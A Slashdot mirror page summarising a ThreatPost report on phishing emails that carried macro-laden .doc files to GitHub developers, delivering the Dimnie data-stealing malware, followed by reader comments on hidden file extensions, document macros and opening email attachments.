Slashdot Mirror
GitHub Repository Owners Targeted By Data-Stealing Malware (threatpost.com)
"Phishing emails zeroing in on developers who own Github repositories were infecting victims with malware capable of stealing data through keyloggers and modules that would snag screenshots," writes ThreatPost. An anonymous reader quotes their report:
Researchers at Palo Alto Networks this week said that in mid-January, an unknown number of developers were targeted with emails purporting to be job offers. The attachments instead carried malicious .doc files containing an embedded macro. The macro executed a PowerShell command that would grab malware from a command and control site and execute it... [Senior threat researcher Brandon] Levene said it's unknown how widespread the January campaign was or why developers were targeted, but given the vast number of projects hosted on the platform, it would likely be an attractive target for either criminals and nation-state attackers.
Levene said the PowerShell script drops a binary named Dimnie, which has been around since 2014 but before January targeted primarily Russian-speaking targets. Someone who received two different emails said they appeared to be hand-crafted, according to Ars Technica, and referenced data changed that same day. They believe this suggests "a focused campaign explicitly targeting targets perceived as 'high return investments,' such as developers (possibly working on popular/open source projects)."
Levene said the PowerShell script drops a binary named Dimnie, which has been around since 2014 but before January targeted primarily Russian-speaking targets. Someone who received two different emails said they appeared to be hand-crafted, according to Ars Technica, and referenced data changed that same day. They believe this suggests "a focused campaign explicitly targeting targets perceived as 'high return investments,' such as developers (possibly working on popular/open source projects)."
Many trojans were distributed as resume.txt.exe at one point, so you really did have to be afraid of opening ".txt" files since the Windows default at the time would hide the .exe... unless of course you were one of the people who understood the risk. Is this insane? Well yes... Microsoft should've never hid the extension by default. The fault is entirely theirs. Just like how the fault is entirely theirs that a .doc file has a built-in control language easily used to contain a malicious payload.
Simple solution is not to use the programs that execute the malicious code while reading a document, but this falls under 'having to know it' and isn't a good solution for the commons.
Because one aspect of the 'more structured' is a handy mechanism for executing code on your system if you open it. If text editors habitually executed any shell scripts included in .txt files; we'd be nervous about those as well. Greater complexity is hardly completely safe, since it makes implementation of software capable of opening the file more complex; but that's a comparatively minor difference of degree compared to the difference between files types where automatic execution is a feature and ones where it's a bug.
As a general rule: I don't open stuff from email, regardless of who sent it.
Yes, that's because you don't have a job.
Those of us with actual paying jobs don't have the luxury of not opening e-mail attachments.